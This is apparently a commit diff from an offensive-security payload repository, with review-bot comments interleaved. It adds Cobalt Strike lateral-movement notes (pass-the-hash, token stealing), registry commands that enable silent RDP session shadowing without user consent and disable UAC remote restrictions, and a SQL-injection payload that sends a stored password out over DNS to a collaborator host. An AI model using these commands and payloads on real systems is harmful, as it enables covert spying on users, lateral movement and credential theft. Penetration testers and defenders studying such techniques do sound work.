mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-22 03:08:50 +00:00
Remote Desktop Services Shadowing
This commit is contained in:
parent
4fe1d71ad8
commit
1137bfca8d
@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe
## Lateral Movement
- **portscan:** Performs a portscan on a spesific target.
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
:exclamation: This module needs Administrator privileges.
- **steal_token:** Steal a token from a specified process.
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
:warning: All the commands launch powershell.exe
```powershell
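Review bot: the `pth` bullet says the NTLM hash is used to "inject a TGT on the current process", but pass-the-hash creates a new logon session from the hash and impersonates its token; it does not obtain a Kerberos TGT (that would be overpass-the-hash via `asktgt`, which this hunk does not describe), so reword to "impersonate a logon session created from the hash". Also fix the typos "spesific" in the portscan bullet and "lateraly" in the jump bullet.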
@ -25,6 +25,7 @@
* [RDP Backdoor](#rdp-backdoor)
* [utilman.exe](#utilman.exe)
* [sethc.exe](#sethc.exe)
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
* [References](#references)
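Review bot: the new entry's anchor `#remote-desktop-services-shadowing` matches the heading slug, but the neighbouring `#utilman.exe` and `#sethc.exe` links in the same list will not resolve on GitHub, which strips dots from heading ids (`#utilmanexe`, `#sethcexe`); worth fixing in the same pass since this hunk already touches that list.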
@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```
### Remote Desktop Services Shadowing
:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.
Requirements:
* RDP must be running
```powershell
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
# 4 – View Session without user’s permission.
# Allowing remote connections to this computer
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Disable UAC remote restriction
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID;
# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent;
# /prompt parameter is used to specify a user’s credentials to connect to a remote host.
```
### Skeleton Key
```powershell
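Review bot: the `reg add ... /v Shadow /t REG_DWORD /d 4` line is the only `reg add` in the block without `/f`, so when the policy value already exists it stops on the "Value Shadow exists, overwrite?" prompt; add `/f` for consistency with the `fDenyTSConnections` and `LocalAccountTokenFilterPolicy` lines below it. The `# 4 – View Session without user’s permission.` comment would be more useful if it listed the other Shadow policy values (0 disabled, 1 full control with permission, 2 full control without permission, 3 view with permission) so readers see what 4 selects. The "Requirements" list has a single bullet; it should also state that the connecting account needs local administrator rights on the target, which is the reason the `LocalAccountTokenFilterPolicy` line is there, and the section lacks a one-line description of what shadowing is (attaching `mstsc` to an existing interactive session) before the `:warning:` about FreeRDP and rdesktop.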
@ -15,6 +15,8 @@
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked query](#mssql-stacked-query)
* [MSSQL Command execution](#mssql-command-execution)
* [MSSQL Out of band](#mssql-out-of-band)
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
* [MSSQL Trusted Links](#mssql-trusted-links)
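Review bot: `MSSQL DNS exfiltration` is added at the same list level as `MSSQL Out of band`, but in the body it is a `###` subsection under the `## MSSQL Out of band` heading (as is the `### MSSQL UNC Path` heading that follows it); indent the DNS exfiltration and UNC path bullets under the Out of band entry so the table of contents mirrors the heading hierarchy.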
@ -187,8 +189,18 @@ print(sys.version)
GO
```
## MSSQL Out of band
## MSSQL UNC Path
### MSSQL DNS exfiltration
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
```powershell
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
```
### MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
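Review bot: the payload line `1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))` contains `frop`, a typo for `from`, so the example fails with a syntax error as written. The fence is tagged `powershell` although the block is a T-SQL fragment (`sql` is the right tag), `xxxxxxx.burpcollaborator.net` should be called out as a placeholder for the reader's own collaborator domain, and a short sentence explaining that the UNC path in `fn_trace_gettable` makes the SQL Server host resolve the attacker-controlled hostname over DNS (which is what carries the data out, and what egress DNS filtering on the database host blocks) would give the heading "DNS exfiltration" the context it currently lacks.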